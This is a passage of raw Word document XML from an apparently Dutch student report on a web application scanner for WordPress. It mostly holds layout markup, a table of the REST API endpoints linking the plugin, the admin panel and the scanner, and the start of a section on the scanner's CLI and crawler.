                              <w:t>Figuur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F06FE" id="Text Box 787" o:spid="_x0000_s1097" type="#_x0000_t202" style="position:absolute;left:0;text-align:left;margin-left:-16pt;margin-top:54.1pt;width:70pt;height:27.4pt;z-index:2532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" filled="f" stroked="f">
                <v:textbox>
                  <w:txbxContent>
                    <w:p w14:paraId="5D245261" w14:textId="0ACC1AC6" w:rsidR="002A05E5" w:rsidRDefault="002A05E5" w:rsidP="0075098B">
                      <w:r>
                        <w:t>Figuur 4.7</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2547072" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="59236864" wp14:editId="39075FC5">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>3547745</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>3090545</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="953135" cy="23114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9531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B393A" w14:textId="68376A43" w:rsidR="002A05E5" w:rsidRDefault="002A05E5">
                            <w:r>
                              <w:t>Link naar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6864" id="Text Box 199" o:spid="_x0000_s1098" type="#_x0000_t202" style="position:absolute;left:0;text-align:left;margin-left:279.35pt;margin-top:243.35pt;width:75.05pt;height:18.2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" filled="f" stroked="f">
                <v:textbox>
                  <w:txbxContent>
                    <w:p w14:paraId="5D6B393A" w14:textId="68376A43" w:rsidR="002A05E5" w:rsidRDefault="002A05E5">
                      <w:r>
                        <w:t>Link naar pdf</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2548096" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="74D3E7A4" wp14:editId="0E50B961">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>4625340</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>3090545</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="1588135" cy="68834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588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4E89C" w14:textId="5129A8E2" w:rsidR="002A05E5" w:rsidRDefault="002A05E5">
                            <w:r>
                              <w:t>Knop waarmee een rapport nogmaals verzonden kan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E7A4" id="Text Box 202" o:spid="_x0000_s1099" type="#_x0000_t202" style="position:absolute;left:0;text-align:left;margin-left:364.2pt;margin-top:243.35pt;width:125.05pt;height:54.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" filled="f" stroked="f">
                <v:textbox>
                  <w:txbxContent>
                    <w:p w14:paraId="65A4E89C" w14:textId="5129A8E2" w:rsidR="002A05E5" w:rsidRDefault="002A05E5">
                      <w:r>
                        <w:t>Knop waarmee een rapport nogmaals verzonden kan worden</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1689977" behindDoc="1" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="2790F95D" wp14:editId="2915097E">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>-264160</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>1028065</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="6603393" cy="2860040"/>
                <wp:effectExtent l="0" t="0" r="26035" b="35560"/>
                <wp:wrapNone/>
                <wp:docPr id="145" name="Rectangle 145"/>
                <wp:cNvGraphicFramePr/>
                <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingShape">
                    <wps:wsp>
                      <wps:cNvSpPr/>
                      <wps:spPr>
                        <a:xfrm>
                          <a:off x="0" y="0"/>
                          <a:ext cx="6603393" cy="286004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CA4DC" id="Rectangle 145" o:spid="_x0000_s1026" style="position:absolute;margin-left:-20.8pt;margin-top:80.95pt;width:519.95pt;height:225.2pt;z-index:-25162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" fillcolor="#b4c7e7" strokecolor="#1f3763 [1604]" strokeweight="1pt"/>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r w:rsidR="002A7B3D">
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-GB" w:eastAsia="en-GB"/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="252544000" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="2E7B4C8B" wp14:editId="65AF341C">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>5708153</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>2634118</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="7095" cy="335501"/>
                <wp:effectExtent l="0" t="0" r="43815" b="45720"/>
                <wp:wrapNone/>
                <wp:docPr id="190" name="Straight Connector 190"/>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23077" id="Straight Connector 190" o:spid="_x0000_s1026" style="position:absolute;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45pt,207.4pt" to="450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" strokecolor="#4472c4 [3204]" strokeweight=".5pt">
                <v:stroke joinstyle="miter"/>
              </v:line>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r w:rsidR="002A7B3D">
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-GB" w:eastAsia="en-GB"/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="252539904" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="387E2B75" wp14:editId="570E5115">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>3993460</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>2634118</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="7095" cy="335501"/>
                <wp:effectExtent l="0" t="0" r="43815" b="45720"/>
                <wp:wrapNone/>
                <wp:docPr id="188" name="Straight Connector 188"/>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2793F" id="Straight Connector 188" o:spid="_x0000_s1026" style="position:absolute;flip:x;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207.4pt" to="315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15328" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="7E23E9F4" wp14:editId="1BC67A27">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>563963</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>1602105</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="5080166" cy="2540"/>
                <wp:effectExtent l="0" t="0" r="25400" b="48260"/>
                <wp:wrapNone/>
                <wp:docPr id="568" name="Straight Connector 568"/>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756B" id="Straight Connector 568" o:spid="_x0000_s1026" style="position:absolute;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26.15pt" to="444.4pt,1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25568" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="29A70BA3" wp14:editId="6EBF609E">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>5322570</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>1263650</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="635000" cy="2286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ED3A3" w14:textId="64607578" w:rsidR="002A05E5" w:rsidRDefault="002A05E5">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70BA3" id="Text Box 153" o:spid="_x0000_s1100" type="#_x0000_t202" style="position:absolute;left:0;text-align:left;margin-left:419.1pt;margin-top:99.5pt;width:50pt;height:18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" filled="f" stroked="f">
                <v:textbox>
                  <w:txbxContent>
                    <w:p w14:paraId="6CFED3A3" w14:textId="64607578" w:rsidR="002A05E5" w:rsidRDefault="002A05E5">
                      <w:r>
                        <w:t>Admi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6592" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="4AC77CED" wp14:editId="3B49AE5C">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>4497705</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>1258570</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="699135" cy="2286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699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6A130" w14:textId="0ABFD960" w:rsidR="002A05E5" w:rsidRDefault="002A05E5">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77CED" id="Text Box 159" o:spid="_x0000_s1101" type="#_x0000_t202" style="position:absolute;left:0;text-align:left;margin-left:354.15pt;margin-top:99.1pt;width:55.05pt;height:18pt;z-index:25252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22VXsCAABkBQAADgAAAGRycy9lMm9Eb2MueG1srFTdT9swEH+ftP/B8vtI21G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" filled="f" stroked="f">
                <v:textbox>
                  <w:txbxContent>
                    <w:p w14:paraId="2BD6A130" w14:textId="0ABFD960" w:rsidR="002A05E5" w:rsidRDefault="002A05E5">
                      <w:r>
                        <w:t>[Klan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7616" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="3381DA07" wp14:editId="7FBEF573">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>3481705</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>1258570</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="828040" cy="22860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82804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E66CB" w14:textId="057568E4" w:rsidR="002A05E5" w:rsidRDefault="002A05E5">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DA07" id="Text Box 162" o:spid="_x0000_s1102" type="#_x0000_t202" style="position:absolute;left:0;text-align:left;margin-left:274.15pt;margin-top:99.1pt;width:65.2pt;height:1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" filled="f" stroked="f">
                <v:textbox>
                  <w:txbxContent>
                    <w:p w14:paraId="703E66CB" w14:textId="057568E4" w:rsidR="002A05E5" w:rsidRDefault="002A05E5">
                      <w:r>
                        <w:t>[Rappor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1472" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="4C0359AF" wp14:editId="1DA27459">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>2590165</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>1832610</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="1405255" cy="34226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140525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F69F4" w14:textId="7C50A985" w:rsidR="002A05E5" w:rsidRDefault="002A05E5" w:rsidP="004756DF">
                            <w:r w:rsidRPr="004756DF">
                              <w:rPr>
                                <w:sz w:val="28"/>
                              </w:rPr>
                              <w:t>Rappor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59AF" id="Text Box 141" o:spid="_x0000_s1103" type="#_x0000_t202" style="position:absolute;left:0;text-align:left;margin-left:203.95pt;margin-top:144.3pt;width:110.65pt;height:26.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" filled="f" stroked="f">
                <v:textbox>
                  <w:txbxContent>
                    <w:p w14:paraId="67CF69F4" w14:textId="7C50A985" w:rsidR="002A05E5" w:rsidRDefault="002A05E5" w:rsidP="004756DF">
                      <w:r w:rsidRPr="004756DF">
                        <w:rPr>
                          <w:sz w:val="28"/>
                        </w:rPr>
                        <w:t>Rapportscherm</w:t>
                      </w:r>
                    </w:p>
                  </w:txbxContent>
                </v:textbox>
                <w10:wrap type="square"/>
              </v:shape>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r w:rsidR="00B568D8">
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="0AF292CD" w14:textId="77777777" w:rsidR="000D698A" w:rsidRDefault="000D698A">
      <w:pPr>
        <w:sectPr w:rsidR="000D698A" w:rsidSect="0096760D">
          <w:headerReference w:type="first" r:id="rId56"/>
          <w:pgSz w:w="11906" w:h="16838"/>
          <w:pgMar w:top="0" w:right="1418" w:bottom="0" w:left="1418" w:header="708" w:footer="708" w:gutter="0"/>
          <w:cols w:space="708"/>
          <w:titlePg/>
          <w:docGrid w:linePitch="360"/>
        </w:sectPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="764ED3DD" w14:textId="77777777" w:rsidR="0096760D" w:rsidRDefault="0096760D" w:rsidP="00414956">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0657A02B" w14:textId="5F24B0F8" w:rsidR="00C05EA7" w:rsidRDefault="00414956" w:rsidP="00414956">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-GB" w:eastAsia="en-GB"/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="252511232" behindDoc="1" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="08B9B8FA" wp14:editId="49567BBC">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>-902335</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>-899298</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="317500" cy="13102731"/>
                <wp:effectExtent l="0" t="0" r="38100" b="29210"/>
                <wp:wrapNone/>
                <wp:docPr id="535" name="Rectangle 53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8F2F4" id="Rectangle 535" o:spid="_x0000_s1026" style="position:absolute;margin-left:-71.05pt;margin-top:-70.75pt;width:25pt;height:1031.7pt;z-index:-25080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" fillcolor="#ffd966 [1943]" strokecolor="#ffd966" strokeweight="1pt"/>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r w:rsidR="00B570EF">
        <w:t>4.4 API</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4922AF9C" w14:textId="77777777" w:rsidR="0096760D" w:rsidRPr="0096760D" w:rsidRDefault="0096760D" w:rsidP="0096760D"/>
    <w:p w14:paraId="11714C9E" w14:textId="0BDB1CAF" w:rsidR="00817EEE" w:rsidRDefault="00817EEE" w:rsidP="00817EEE">
      <w:r>
        <w:t>De API zorgt voor de communicatie tussen de WordPress extensie en de webapplicatie scanner en is van de type REST API. REST API’s communiceren over HTTP en gebruiken hierbij de HTTP werkwoorden zoals GET en POST.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42950857" w14:textId="0D60172B" w:rsidR="00817EEE" w:rsidRDefault="00817EEE" w:rsidP="00817EEE">
      <w:r>
        <w:t>Van het registreren tot het aanvragen van een scan de WordPress extensie roept voor</w:t>
      </w:r>
      <w:r w:rsidR="00BB7B3C">
        <w:t xml:space="preserve"> bijna</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> elke handeling die aan de kant van de webapplicatie scanner uitgevoerd moet worden aan via de API, maar ook de admin paneel voert API Calls uit om accounts te activeren en rapporten te verzenden. Hieronder een lijst met alle API Calls.</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="GridTable4-Accent4"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="2158"/>
        <w:gridCol w:w="3882"/>
        <w:gridCol w:w="3020"/>
      </w:tblGrid>
      <w:tr w:rsidR="00817EEE" w14:paraId="6FD59907" w14:textId="77777777"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A6DBB42" w14:textId="77777777" w:rsidR="00817EEE" w:rsidRDefault="00817EEE" w:rsidP="00BA7824">
            <w:r>
              <w:t>Type</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3883" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0EB5C206"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URI</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3021" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="6DE11AFF"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Omschrijving</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00817EEE" w14:paraId="0AC96E2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05C8D10" w14:textId="77777777" w:rsidR="00817EEE" w:rsidRDefault="00817EEE" w:rsidP="00BA7824">
            <w:r>
              <w:t>WordPress</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3883" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="299C91D4" w14:textId="383C5022" w:rsidR="00817EEE" w:rsidRDefault="007B6FB0" w:rsidP="00BA7824">
            <w:pPr>
              <w:cnfStyle w:val="000000100000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="1" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
            </w:pPr>
            <w:r>
              <w:t>HTTP POST</w:t>
            </w:r>
            <w:r w:rsidR="00817EEE">
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidR="00817EEE" w:rsidRPr="00C3239B">
              <w:rPr>
                <w:color w:val="C45911" w:themeColor="accent2" w:themeShade="BF"/>
              </w:rPr>
              <w:t>/request_scan</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3021" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="769344F5"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anvragen van scan</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00817EEE" w14:paraId="7B265780"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6C92BD08" w14:textId="77777777" w:rsidR="00817EEE" w:rsidRDefault="00817EEE" w:rsidP="00BA7824">
            <w:r>
              <w:t>WordPress</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3883" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="546ABBF7"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TTP POST /</w:t>
            </w:r>
            <w:r w:rsidRPr="00C3239B">
              <w:rPr>
                <w:color w:val="C45911" w:themeColor="accent2" w:themeShade="BF"/>
              </w:rPr>
              <w:t>register_customer</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3021" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="1DB9C77A"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egistreren van klant</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00817EEE" w14:paraId="24F2346C"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8F7D4F2" w14:textId="77777777" w:rsidR="00817EEE" w:rsidRDefault="00817EEE" w:rsidP="00BA7824">
            <w:r>
              <w:t>WordPress</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3883" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="26B0FCB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POST </w:t>
            </w:r>
            <w:r w:rsidRPr="00C3239B">
              <w:rPr>
                <w:color w:val="C45911" w:themeColor="accent2" w:themeShade="BF"/>
              </w:rPr>
              <w:t>/auth</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3021" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="6EDCBAA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Het authentiseren van een klant</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00817EEE" w14:paraId="351867BD"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AD1E846" w14:textId="77777777" w:rsidR="00817EEE" w:rsidRDefault="00817EEE" w:rsidP="00BA7824">
            <w:r>
              <w:t>Admin paneel</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3883" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="61C8CBD9"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admin</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3021" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="6F413EF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Admin paneel opvragen</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00817EEE" w14:paraId="1D4B681B"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4507C87" w14:textId="77777777" w:rsidR="00817EEE" w:rsidRDefault="00817EEE" w:rsidP="00BA7824">
            <w:r>
              <w:t>Admin paneel</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3883" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="1EC609B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customers</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3021" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="2E7017BD"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Klanten tabel opvragen</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00817EEE" w14:paraId="4547AE54"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0E5A15B" w14:textId="77777777" w:rsidR="00817EEE" w:rsidRDefault="00817EEE" w:rsidP="00BA7824">
            <w:r>
              <w:t>Admin paneel</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3883" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="346C203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reports</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3021" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="331B9C4B"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apporten tabel opvragen</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00817EEE" w14:paraId="611F647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9F7B87C" w14:textId="77777777" w:rsidR="00817EEE" w:rsidRDefault="00817EEE" w:rsidP="00BA7824">
            <w:r>
              <w:t>Admin paneel</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3883" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="5F6D636F"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active</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3021" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="028C72D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ctiveren van het account</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00817EEE" w14:paraId="6B595BD8"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0C5D534B" w14:textId="77777777" w:rsidR="00817EEE" w:rsidRDefault="00817EEE" w:rsidP="00BA7824">
            <w:r>
              <w:t>Admin paneel</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3883" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7351219C"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send{id}</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3021" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0A8354D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et verzenden van een rapport</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="2CCA5591" w14:textId="7FA6A48E" w:rsidR="00FE2D29" w:rsidRDefault="0075098B" w:rsidP="00817EEE">
      <w:r>
        <w:t>Tabel 4.2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E2554B8" w14:textId="6482893B" w:rsidR="00817EEE" w:rsidRDefault="00817EEE" w:rsidP="00817EEE">
      <w:pPr>
        <w:rPr>
          <w:smallCaps/>
          <w:spacing w:val="5"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D2C57B5" w14:textId="1F9812FD" w:rsidR="006E3A79" w:rsidRPr="00201CBB" w:rsidRDefault="00201CBB" w:rsidP="00ED01AE">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-GB" w:eastAsia="en-GB"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="252553216" behindDoc="1" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="0E3C72C9" wp14:editId="18973983">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>-900430</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>-3002854</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="317500" cy="13102731"/>
                <wp:effectExtent l="0" t="0" r="38100" b="29210"/>
                <wp:wrapNone/>
                <wp:docPr id="213" name="Rectangle 21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DE26B" id="Rectangle 213" o:spid="_x0000_s1026" style="position:absolute;margin-left:-70.9pt;margin-top:-236.4pt;width:25pt;height:1031.7pt;z-index:-2507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nRLQCAADx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" fillcolor="#ffd966 [1943]" strokecolor="#ffd966" strokeweight="1pt"/>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r w:rsidR="00B568D8">
        <w:t>4.5</w:t>
      </w:r>
      <w:r w:rsidR="006E3A79" w:rsidRPr="003D45FB">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00650BF0">
        <w:t>Webapplicatie scanner</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10AC6DEF" w14:textId="30CD8C57" w:rsidR="006E3A79" w:rsidRDefault="006E3A79" w:rsidP="006E3A79"/>
    <w:p w14:paraId="5F431DF6" w14:textId="1DAC4706" w:rsidR="00982F21" w:rsidRPr="00976386" w:rsidRDefault="00F71C6B" w:rsidP="006E3A79">
      <w:pPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00976386">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Introductie</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68152D6F" w14:textId="0039F7AE" w:rsidR="00F71C6B" w:rsidRDefault="00315691" w:rsidP="006E3A79">
      <w:r>
        <w:t xml:space="preserve">In dit deel zal ik inzoomen op het conceptuele ontwerp van de </w:t>
      </w:r>
      <w:r w:rsidR="00650BF0">
        <w:t>Webapplicatie scanner</w:t>
      </w:r>
      <w:r w:rsidR="000900D0">
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r w:rsidR="00E3472A">
        <w:t xml:space="preserve">Zoals </w:t>
      </w:r>
      <w:r w:rsidR="00652090">
        <w:t xml:space="preserve">eerder, in de inleiding van dit hoofdstuk vermelde ik wat de kerncomponenten zijn </w:t>
      </w:r>
      <w:r w:rsidR="00E52E20">
        <w:t xml:space="preserve">van een </w:t>
      </w:r>
      <w:r w:rsidR="009D07A1">
        <w:t>w</w:t>
      </w:r>
      <w:r w:rsidR="00650BF0">
        <w:t>ebapplicatie scanner</w:t>
      </w:r>
      <w:r w:rsidR="00E52E20">
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="003B0D65">
        <w:t xml:space="preserve"> De database heb ik eruit </w:t>
      </w:r>
      <w:r w:rsidR="00A67C2C">
        <w:t>gelaten omda</w:t>
      </w:r>
      <w:r w:rsidR="0021750B">
        <w:t xml:space="preserve">t het </w:t>
      </w:r>
      <w:r w:rsidR="0022082C">
        <w:t>t</w:t>
      </w:r>
      <w:r w:rsidR="00DC610A">
        <w:t>o</w:t>
      </w:r>
      <w:r w:rsidR="00C87950">
        <w:t xml:space="preserve">t een ander </w:t>
      </w:r>
      <w:r w:rsidR="00D52C84">
        <w:t>subsysteem behoort.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="326BC09A" w14:textId="4D3706B3" w:rsidR="00E52E20" w:rsidRDefault="0031519C" w:rsidP="006E3A79">
      <w:r>
        <w:t>CLI</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="450FF6D6" w14:textId="01BED0E0" w:rsidR="001432D5" w:rsidRDefault="00003C60" w:rsidP="006E3A79">
      <w:r>
        <w:t xml:space="preserve">Een </w:t>
      </w:r>
      <w:r w:rsidR="000B2CBF">
        <w:t>w</w:t>
      </w:r>
      <w:r w:rsidR="00650BF0">
        <w:t>ebapplicatie scanner</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, zoals iedere </w:t>
      </w:r>
      <w:r w:rsidR="00710EE1">
        <w:t>software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t>
      </w:r>
      <w:r w:rsidR="007230D2">
        <w:t>w</w:t>
      </w:r>
      <w:r w:rsidR="00650BF0">
        <w:t>ebapplicatie scanner</w:t>
      </w:r>
      <w:r w:rsidR="00A60266">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00734469">
        <w:t>heeft als interface een Command Line Interface (CLI)</w:t>
      </w:r>
      <w:r w:rsidR="00BB4B03">
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r w:rsidR="00C4112C">
        <w:t>CLI’s bestaan uit een lijst van commando’s die de gebru</w:t>
      </w:r>
      <w:r w:rsidR="00BE5996">
        <w:t>iker kan uitvoeren</w:t>
      </w:r>
      <w:r w:rsidR="00634C15">
        <w:t xml:space="preserve"> in</w:t>
      </w:r>
      <w:r w:rsidR="00BE5996">
        <w:t xml:space="preserve"> een Terminal. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2ECDA9B6" w14:textId="4E79E3F2" w:rsidR="001432D5" w:rsidRDefault="001432D5" w:rsidP="006E3A79">
      <w:r>
        <w:t>Crawler</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="190CEF9A" w14:textId="695D4294" w:rsidR="00BF1E2B" w:rsidRDefault="00CA7C70" w:rsidP="006E3A79">
      <w:r>
        <w:t>De c</w:t>
      </w:r>
      <w:r w:rsidR="002C6EDA">
        <w:t xml:space="preserve">rawler </w:t>
      </w:r>
      <w:r w:rsidR="00830DBB">
        <w:t xml:space="preserve">is een programmeer script dat in verschillende </w:t>
      </w:r>
      <w:r w:rsidR="003A3900">
        <w:t xml:space="preserve">High Level </w:t>
      </w:r>
      <w:r w:rsidR="00EA3454">
        <w:t>programmeertalen</w:t>
